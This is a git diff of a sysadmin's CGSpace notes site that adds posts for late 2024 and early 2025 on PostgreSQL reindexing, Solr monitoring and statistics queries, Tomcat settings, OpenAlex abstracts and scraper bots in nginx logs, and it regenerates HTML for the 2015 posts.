ERROR: could not find function "xml_is_well_formed" in file "/usr/lib/postgresql/15/lib/pgxml.so"
ERROR: function public.xml_valid(text) does not exist
```
- After that I [re-indexed the database indexes](https://adamj.eu/tech/2021/04/13/reindexing-all-tables-after-upgrading-to-postgresql-13/) using a query:
```console
$ su - postgres
$ cat /tmp/generate-reindex.sql
SELECT 'REINDEX TABLE CONCURRENTLY ' || quote_ident(relname) || ' /*' || pg_size_pretty(pg_total_relation_size(C.oid)) || '*/;'
FROM pg_class C
LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
WHERE nspname = 'public'
AND C.relkind = 'r'
AND nspname !~ '^pg_toast'
ORDER BY pg_total_relation_size(C.oid) ASC;
$ psql dspace < /tmp/generate-reindex.sql > /tmp/reindex.sql
$ <trim the extra stuff from /tmp/reindex.sql>
$ psql dspace < /tmp/reindex.sql
```
- The database shrunk by 186MB!
## 2024-09-29
- I upgraded the database on CGSpace to PostgreSQL 15
<!-- vim: set sw=2 ts=2: -->

82
content/posts/2024-10.md Normal file
View File

@ -0,0 +1,82 @@
---
title: "October, 2024"
date: 2024-10-03T11:01:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-10-03
- I had an idea to get abstracts from OpenAlex
- For [copyright reasons they don't include plain abstracts](https://docs.openalex.org/api-entities/works/work-object#abstract_inverted_index), but the [pyalex](https://github.com/J535D165/pyalex) library can convert them on the fly
<!--more-->
- I filtered for journal articles that were Creative Commons and missing abstracts:
```console
$ csvcut -c 'id,dc.title[en_US],dcterms.abstract[en_US],cg.identifier.doi[en_US],dcterms.type[en_US],dcterms.language[en_US],dcterms.license[en_US]' ~/Downloads/2024-09-30-cgspace.csv | csvgrep -c 'dcterms.type[en_US]' -r '^Journal Article$' | csvgrep -c 'cg.identifier.doi[en_US]' -r '^.+$' | csvgrep -c 'dcterms.license[en_US]' -r '^CC-' | csvgrep -c 'dcterms.abstract[en_US]' -r '^$' | csvgrep -c 'dcterms.language[en_US]' -r '^en$' | grep -v "||" | grep -v -- '-ND' | grep -v -E 'https://doi.org/10.(2499|4160|17528)/' > /tmp/missing-abstracts.csv
```
- Then wrote a script to get them from OpenAlex
- After inspecting a few dozen and cleaning them up in OpenRefine (removing "Keywords:", copyright statements, HTML entities, etc) I managed to get about 440
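- A simplified sketch of that kind of lookup with pyalex, which rebuilds the abstract from the inverted index on access (error handling and the cleanup steps are omitted; column names are the ones from the export above, and the email address is a placeholder):

```python
import csv

import pyalex
from pyalex import Works

pyalex.config.email = "me@example.org"  # placeholder address for the polite pool


def abstract_for_doi(doi: str) -> str | None:
    """Look a work up by DOI and let pyalex rebuild the abstract from the inverted index."""
    doi_url = doi if doi.startswith("https://doi.org/") else f"https://doi.org/{doi}"
    try:
        work = Works()[doi_url]
    except Exception:  # not in OpenAlex, network error, etc.
        return None
    return work["abstract"]  # None if OpenAlex has no abstract for this work


with open("/tmp/missing-abstracts.csv", newline="") as f:
    for row in csv.DictReader(f):
        abstract = abstract_for_doi(row["cg.identifier.doi[en_US]"])
        if abstract:
            print(row["id"], abstract[:80])
```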
## 2024-10-06
- Since I increased Solr's heap from 2 to 3G a few weeks ago it seems like Solr is always using 100% CPU
- I don't understand this because it was running well before, and I only increased it in anticipation of running the dspace-statistics-api-js, though never got around to it
- I just realized that this may be related to the JMX monitoring, as I've seen gaps in the Grafana dashboards and remember that it took surprisingly long to scrape the metrics
- Maybe I need to change the scrape interval
## 2024-10-08
- I checked the VictoriaMetrics vmagent dashboard and saw that there were thousands of errors scraping the `jvm_solr` target from Solr
- So it seems like I do need to change the scrape interval
- I will increase it from 15s (global) to 20s for that job
- Reading some documentation I found [this reference from Brian Brazil that discusses this very problem](https://www.robustperception.io/keep-it-simple-scrape_interval-id/)
- He recommends keeping a single scrape interval for all targets, but also checking the slow exporter (`jmx_exporter` in this case) and seeing if we can limit the data we scrape
- To keep things simple for now I will increase the global scrape interval to 20s
- Long term I should limit the metrics...
- Oh wow, I found out that [Solr ships with a Prometheus exporter!](https://solr.apache.org/guide/8_11/monitoring-solr-with-prometheus-and-grafana.html) and even includes a Grafana dashboard
- I'm trying to run the Solr prometheus-exporter as a one-off systemd unit to test it:
```console
# cd /opt/solr-8.11.3/contrib/prometheus-exporter
# systemd-run --uid=victoriametrics --gid=victoriametrics --working-directory=/opt/solr-8.11.3/contrib/prometheus-exporter ./bin/solr-exporter -p 9854 -b http://localhost:8983/solr -f ./conf/solr-exporter-config.xml -s 20
```
- The default scrape interval is 60 seconds, so if we scrape it more frequently than that the metrics will be stale
- From what I've seen this returns in less than one second so it should be safe to reduce the scrape interval
## 2024-10-19
- Heavy load on CGSpace today
- There is a noted increase just before 4PM local time
- I extracted a list of IPs:
```console
# grep -E '19/Oct/2024:1[567]' /var/log/nginx/api-access.log | awk '{print $1}' | sort -u > /tmp/ips.txt
```
- I looked them up and found some data center networks that were using normal user agents across hundreds of IPs, for example:
- 154.47.29.168 # 212238 (CDNEXT - Datacamp Limited, GB)
- 91.210.64.12 # 29802 (HVC-AS, US) - HIVELOCITY, Inc.
- 103.221.57.120 # 132817 (DZCRD-AS-AP DZCRD Networks Ltd, BD)
- 109.107.150.136 # 201341 (CENTURION-INTERNET-SERVICES - trafficforce, UAB, LT) - Code200
- 185.210.207.1 # 209709 (CODE200-ISP1 - UAB code200, LT)
- 185.162.119.101 # 207223 (GLOBALCON - Global Connections Network LLC, US)
- 173.244.35.101 # 64286 (LOGICWEB, US) - Tesonet
- 139.28.160.141 # 396319 (US-INTERNET-396319, US) - OxyLabs
- 104.143.89.112 # 62874 (WEB2OBJECTS, US) - Web2Objects LLC
- I added some network blocks to the nginx conf
- Interestingly, I see so many IPs using the same user agent today:
```console
# grep "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.3" /var/log/nginx/api-access.log | awk '{print $1}' | sort -u | wc -l
767
```
- For reference, the current Chrome version is 129 or so...
- This is definitely worth looking into because it seems like one massive botnet
<!-- vim: set sw=2 ts=2: -->

50
content/posts/2024-11.md Normal file
View File

@ -0,0 +1,50 @@
---
title: "November, 2024"
date: 2024-11-11T09:47:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-11-11
- Some IP in India is making tons of requests this morning with a normal user agent:
```console
# awk '{print $1}' /var/log/nginx/api-access.log | sort | uniq -c | sort -h | tail -n 40
...
513743 49.207.196.249
```
<!--more-->
- They are using this user agent:
```
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.3
```
## 2024-11-16
- I switched CGSpace to Node.js v20 since I've been using it in dev and test for months
## 2024-11-18
- I see a bot (188.34.177.10) on Hetzner has made 35,000 requests this morning and is pretending to be Googlebot, GoogleOther, etc
- Google publishes their range of IPs also: https://developers.google.com/search/docs/crawling-indexing/verifying-googlebot
- Our nginx config doesn't rate limit the API but perhaps that needs to change...
- In DSpace 4/5/6 the API was separate from the user interface so we didn't need to enforce rate limits there because we encouraged using that over scraping the UI
- In DSpace 7 the API is used by the frontend and perhaps should have the same IP- and UA-based rate limiting
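- A quick sketch of checking an address against those published ranges (the googlebot.json URL is the file linked from that verification page; the JSON layout is Google's usual prefix-list format):

```python
import ipaddress

import requests

# JSON list of Googlebot ranges linked from the verification page above
GOOGLEBOT_RANGES = "https://developers.google.com/static/search/apis/ipranges/googlebot.json"


def is_googlebot_ip(ip: str) -> bool:
    """Check whether an address falls inside Google's published Googlebot ranges."""
    prefixes = requests.get(GOOGLEBOT_RANGES, timeout=30).json()["prefixes"]
    addr = ipaddress.ip_address(ip)
    return any(
        addr in ipaddress.ip_network(prefix)
        for p in prefixes
        if (prefix := p.get("ipv4Prefix") or p.get("ipv6Prefix"))
    )


print(is_googlebot_ip("188.34.177.10"))  # False: the Hetzner bot is not really Googlebot
```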
## 2024-11-19
- I notice 10,000 requests by a new bot yesterday:
```
20.38.174.208 - - [18/Nov/2024:07:02:50 +0100] "GET /server/oai/request?verb=ListRecords&resumptionToken=oai_dc%2F2024-10-18T13%3A00%3A49Z%2F%2F%2F400 HTTP/1.1" 503 190 "-" "Laminas_Http_Client"
```
- Seems to be some kind of PHP framework library
- Yesterday one IP in Argentina made nearly 1,000,000 requests using a normal user agent: 181.4.143.40
- 188.34.177.10 ended up making 700,000 requests using various Googlebot, GoogleOther, and even normal Chrome user agents
<!-- vim: set sw=2 ts=2: -->

28
content/posts/2024-12.md Normal file
View File

@ -0,0 +1,28 @@
---
title: "December, 2024"
date: 2024-12-04T10:19:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-12-04
- We need to get view and download statistics for the last year from CGSpace
- The only way to get that is using Solr
<!--more-->
- After consulting the [Solr documentation](https://solr.apache.org/guide/8_11/working-with-dates.html) I came up with this facet query:
> facet.range=time&facet.range.start=NOW/MONTH-11MONTHS&facet.range.end=NOW/MONTH+1MONTH&facet.range.gap=+1MONTH
- [This StackOverflow answer](https://stackoverflow.com/questions/34290600/how-to-apply-facet-on-date-field-where-result-should-provide-number-of-records-f) helped too, recommending `NOW/MONTH` to get neatly bucketed months because this will use the beginning of the current month
- For views, I added the following query parameters: `q=type:2&fq=-isBot:true AND statistics_type:view`
> http://localhost:8983/solr/statistics/select?facet.range.end=NOW%2FMONTH%2B1MONTH&facet.range.gap=%2B1MONTH&facet.range.start=NOW%2FMONTH-11MONTHS&facet.range=time&facet=true&fq=-isBot%3Atrue%20AND%20statistics_type%3Aview&indent=true&q.op=OR&q=type%3A2&rows=0
- For downloads I added the following query parameters: `q=type:0&fq=-isBot:true AND statistics_type:view AND bundleName:ORIGINAL`
> http://localhost:8983/solr/statistics/select?facet.range.end=NOW%2FMONTH%2B1MONTH&facet.range.gap=%2B1MONTH&facet.range.start=NOW%2FMONTH-11MONTHS&facet.range=time&facet=true&fq=-isBot%3Atrue%20AND%20statistics_type%3Aview%20AND%20bundleName%3AORIGINAL&indent=true&q.op=OR&q=type%3A0&rows=0
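- For readability, the same views query expressed with the parameters spelled out via Python requests (downloads is identical except for `q=type:0` and the extra `AND bundleName:ORIGINAL` filter):

```python
import requests

params = {
    "q": "type:2",
    "fq": "-isBot:true AND statistics_type:view",
    "rows": 0,
    "facet": "true",
    "facet.range": "time",
    "facet.range.start": "NOW/MONTH-11MONTHS",
    "facet.range.end": "NOW/MONTH+1MONTH",
    "facet.range.gap": "+1MONTH",
}
r = requests.get("http://localhost:8983/solr/statistics/select", params=params, timeout=60)

# Solr returns the range facet as a flat [bucket, count, bucket, count, ...] list
counts = r.json()["facet_counts"]["facet_ranges"]["time"]["counts"]
for month, views in zip(counts[::2], counts[1::2]):
    print(month, views)
```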
<!-- vim: set sw=2 ts=2: -->

38
content/posts/2025-01.md Normal file
View File

@ -0,0 +1,38 @@
---
title: "January, 2025"
date: 2025-01-03T11:09:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2025-01-03
- Trying to get search results for a large boolean query given to me by some researchers
- When searching via the Angular frontend I see an error in the Tomcat logs:
<!--more-->
```
Jan 03 09:08:40 dspace tomcat9[876]: Jan 03, 2025 9:08:40 AM org.apache.coyote.http11.Http11Processor service
Jan 03 09:08:40 dspace tomcat9[876]: INFO: Error parsing HTTP request header
Jan 03 09:08:40 dspace tomcat9[876]: Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
Jan 03 09:08:40 dspace tomcat9[876]: java.lang.IllegalArgumentException: Request header is too large
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.coyote.http11.Http11InputBuffer.fill(Http11InputBuffer.java:778)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.coyote.http11.Http11InputBuffer.parseHeader(Http11InputBuffer.java:892)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.coyote.http11.Http11InputBuffer.parseHeaders(Http11InputBuffer.java:593)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:279)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:937)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1791)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1190)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:63)
Jan 03 09:08:40 dspace tomcat9[876]: at java.base/java.lang.Thread.run(Thread.java:840)
```
- The size of the query itself is 5362 bytes
- Increasing the `maxHttpHeaderSize` from the default of 8192 bytes to 16384 allows the search to complete successfully
- I notice that we had previously increased the `maxHttpHeaderSize` on the HTTP connector in Tomcat 7, which we are no longer using in Tomcat 9, so this is an overdue change
<!-- vim: set sw=2 ts=2: -->

View File

@ -0,0 +1,66 @@
+++
title = "Harmonization of CG Core Output Types"
date = 2021-02-21T13:27:35+02:00
description = "Proposed changes to CG Core types after review of several CGIAR repositories."
categories = ["Notes"]
tags = ["Migration"]
url = "cgcore-types-harmonization"
draft = true
+++
Proposed changes to the CG Core controlled vocabulary for output types after review of actual usage by several CGIAR open access repositories.
With reference to [CG Core v2 draft standard](https://agriculturalsemantics.github.io/cg-core/cgcore.html) by Marie-Angélique as well as [DCMI DCTERMS](http://www.dublincore.org/specifications/dublin-core/dcmi-terms/).
<!--more-->
- [Proposed Changes](#proposed-changes)
- [Out of Scope](#out-of-scope)
- [Implementation Progress](#implementation-progress)
## Proposed Changes
As of 2021-01-18 the scope of the changes includes the following fields:
- cg.creator.id→cg.creator.identifier
- ORCID identifiers
- dc.format.extent→dcterms.extent
- dc.date.issued→dcterms.issued
- dc.description.abstract→dcterms.abstract
- dc.description→dcterms.description
- dc.description.sponsorship→cg.contributor.donor
- values from CrossRef or Grid.ac if possible
- dc.description.version→cg.reviewStatus
- cg.fulltextstatus→cg.howPublished
- CGSpace uses values like "Formally Published" or "Grey Literature"
- dc.identifier.citation→dcterms.bibliographicCitation
- cg.identifier.status→dcterms.accessRights
- current values are "Open Access" and "Limited Access"
- future values are possibly "Open" and "Restricted"?
- dc.language.iso→dcterms.language
- current values are ISO 639-1 (aka Alpha 2)
- future values are possibly ISO 639-3 (aka Alpha 3)?
- cg.link.reference→dcterms.relation
- dc.publisher→dcterms.publisher
- dc.relation.ispartofseries will be split into:
- series name: dcterms.isPartOf
- series number: cg.number
- dc.rights→dcterms.license
- Using [SPDX license identifiers](https://spdx.org/licenses/) if possible
- dc.source→cg.journal
- dc.subject→dcterms.subject
- dc.type→dcterms.type
- dc.identifier.isbn→cg.isbn
- dc.identifier.issn→cg.issn
- cg.targetaudience→dcterms.audience
### Out of Scope
The following fields are currently out of the scope of this migration because they are used internally by DSpace 5.x/6.x and would be difficult to change without significant modifications to the core of the code:
- dc.title (`IncludePageMeta.java` only considers DC when building pageMeta, which we rely on in XMLUI because of XSLT from DRI)
- dc.title.alternative
- dc.date.available
- dc.date.accessioned
- dc.identifier.uri (hard coded for Handle assignment upon item submission)
- dc.description.provenance
- dc.contributor.author (`IncludePageMeta.java` only considers DC when building pageMeta, which we rely on in XMLUI because of XSLT from DRI)

View File

@ -15,6 +15,7 @@ With reference to [CG Core v2 draft standard](https://agriculturalsemantics.gith
<!--more-->
- [Proposed Changes](#proposed-changes)
- [Out of Scope](#out-of-scope)
- [Fields to Create](#fields-to-create)
- [Fields to Delete](#fields-to-delete)
- [Implementation Progress](#implementation-progress)
@ -54,6 +55,7 @@ As of 2021-01-18 the scope of the changes includes the following fields:
- dc.identifier.issn→cg.issn
- cg.targetaudience→dcterms.audience
### Out of Scope
The following fields are currently out of the scope of this migration because they are used internally by DSpace 5.x/6.x and would be difficult to change without significant modifications to the core of the code:
- dc.title (`IncludePageMeta.java` only considers DC when building pageMeta, which we rely on in XMLUI because of XSLT from DRI)

View File

@ -34,7 +34,7 @@ Last week I had increased the limit from 30 to 60, which seemed to help, but now
$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
78
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -64,12 +64,12 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -116,7 +116,7 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<time datetime="2015-11-23T17:00:57+03:00">Mon Nov 23, 2015</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -126,7 +126,7 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<li>Looks like DSpace exhausted its PostgreSQL connection pool</li>
<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
78
</code></pre><ul>
<li>For now I have increased the limit from 60 to 90, run updates, and rebooted the server</li>
@ -137,7 +137,7 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<li>Getting emails from uptimeRobot and uptimeButler that it&rsquo;s down, and Google Webmaster Tools is sending emails that there is an increase in crawl errors</li>
<li>Looks like there are still a bunch of idle PostgreSQL connections:</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
96
</code></pre><ul>
<li>For some reason the number of idle connections is very high since we upgraded to DSpace 5</li>
@ -147,7 +147,7 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<li>Troubleshoot the DSpace 5 OAI breakage caused by nginx routing config</li>
<li>The OAI application requests stylesheets and javascript files with the path <code>/oai/static/css</code>, which gets matched here:</li>
</ul>
<pre><code># static assets we can load from the file system directly with nginx
<pre tabindex="0"><code># static assets we can load from the file system directly with nginx
location ~ /(themes|static|aspects/ReportingSuite) {
try_files $uri @tomcat;
...
@ -158,21 +158,21 @@ location ~ /(themes|static|aspects/ReportingSuite) {
<li>We simply need to add <code>include extra-security.conf;</code> to the above location block (but research and test first)</li>
<li>We should add WOFF assets to the list of things to set expires for:</li>
</ul>
<pre><code>location ~* \.(?:ico|css|js|gif|jpe?g|png|woff)$ {
<pre tabindex="0"><code>location ~* \.(?:ico|css|js|gif|jpe?g|png|woff)$ {
</code></pre><ul>
<li>We should also add <code>aspects/Statistics</code> to the location block for static assets (minus <code>static</code> from above):</li>
</ul>
<pre><code>location ~ /(themes|aspects/ReportingSuite|aspects/Statistics) {
<pre tabindex="0"><code>location ~ /(themes|aspects/ReportingSuite|aspects/Statistics) {
</code></pre><ul>
<li>Need to check <code>/about</code> on CGSpace, as it&rsquo;s blank on my local test server and we might need to add something there</li>
<li>CGSpace has been up and down all day due to PostgreSQL idle connections (current DSpace pool is 90):</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
93
</code></pre><ul>
<li>I looked closer at the idle connections and saw that many have been idle for hours (current time on server is <code>2015-11-25T20:20:42+0000</code>):</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | less -S
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | less -S
datid | datname | pid | usesysid | usename | application_name | client_addr | client_hostname | client_port | backend_start | xact_start |
-------+----------+-------+----------+----------+------------------+-------------+-----------------+-------------+-------------------------------+-------------------------------+---
20951 | cgspace | 10966 | 18205 | cgspace | | 127.0.0.1 | | 37731 | 2015-11-25 13:13:02.837624+00 | | 20
@ -191,13 +191,13 @@ datid | datname | pid | usesysid | usename | application_name | client_addr
<li>CCAFS colleagues mentioned that the REST API is very slow, 24 seconds for one item</li>
<li>Not as bad for me, but still unsustainable if you have to get many:</li>
</ul>
<pre><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
<pre tabindex="0"><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
8.415
</code></pre><ul>
<li>Monitoring e-mailed in the evening to say CGSpace was down</li>
<li>Idle connections in PostgreSQL again:</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
66
</code></pre><ul>
<li>At the time, the current DSpace pool size was 50&hellip;</li>
@ -208,14 +208,14 @@ datid | datname | pid | usesysid | usename | application_name | client_addr
<li>Still more alerts that CGSpace has been up and down all day</li>
<li>Current database settings for DSpace:</li>
</ul>
<pre><code>db.maxconnections = 30
<pre tabindex="0"><code>db.maxconnections = 30
db.maxwait = 5000
db.maxidle = 8
db.statementpool = true
</code></pre><ul>
<li>And idle connections:</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
49
</code></pre><ul>
<li>Perhaps I need to start drastically increasing the connection limits—like to 300—to see if DSpace&rsquo;s thirst can ever be quenched</li>
@ -242,15 +242,15 @@ db.statementpool = true
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -36,7 +36,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -66,12 +66,12 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -118,7 +118,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
<time datetime="2015-12-02T13:18:00+03:00">Wed Dec 02, 2015</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -126,7 +126,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
<ul>
<li>Replace <code>lzop</code> with <code>xz</code> in log compression cron jobs on DSpace Test—it uses less space:</li>
</ul>
<pre><code># cd /home/dspacetest.cgiar.org/log
<pre tabindex="0"><code># cd /home/dspacetest.cgiar.org/log
# ls -lh dspace.log.2015-11-18*
-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
@ -137,20 +137,20 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
<li>CGSpace went down again (due to PostgreSQL idle connections of course)</li>
<li>Current database settings for DSpace are <code>db.maxconnections = 30</code> and <code>db.maxidle = 8</code>, yet idle connections are exceeding this:</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
39
</code></pre><ul>
<li>I restarted PostgreSQL and Tomcat and it&rsquo;s back</li>
<li>On a related note of why CGSpace is so slow, I decided to finally try the <code>pgtune</code> script to tune the postgres settings:</li>
</ul>
<pre><code># apt-get install pgtune
<pre tabindex="0"><code># apt-get install pgtune
# pgtune -i /etc/postgresql/9.3/main/postgresql.conf -o postgresql.conf-pgtune
# mv /etc/postgresql/9.3/main/postgresql.conf /etc/postgresql/9.3/main/postgresql.conf.orig
# mv postgresql.conf-pgtune /etc/postgresql/9.3/main/postgresql.conf
</code></pre><ul>
<li>It introduced the following new settings:</li>
</ul>
<pre><code>default_statistics_target = 50
<pre tabindex="0"><code>default_statistics_target = 50
maintenance_work_mem = 480MB
constraint_exclusion = on
checkpoint_completion_target = 0.9
@ -164,7 +164,7 @@ max_connections = 80
<li>Now I need to go read PostgreSQL docs about these options, and watch memory settings in munin etc</li>
<li>For what it&rsquo;s worth, now the REST API should be faster (because of these PostgreSQL tweaks):</li>
</ul>
<pre><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
<pre tabindex="0"><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
1.474
$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
2.141
@ -189,7 +189,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<li>CGSpace very slow, and monitoring emailing me to say its down, even though I can load the page (very slowly)</li>
<li>Idle postgres connections look like this (with no change in DSpace db settings lately):</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
29
</code></pre><ul>
<li>I restarted Tomcat and postgres&hellip;</li>
@ -197,7 +197,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
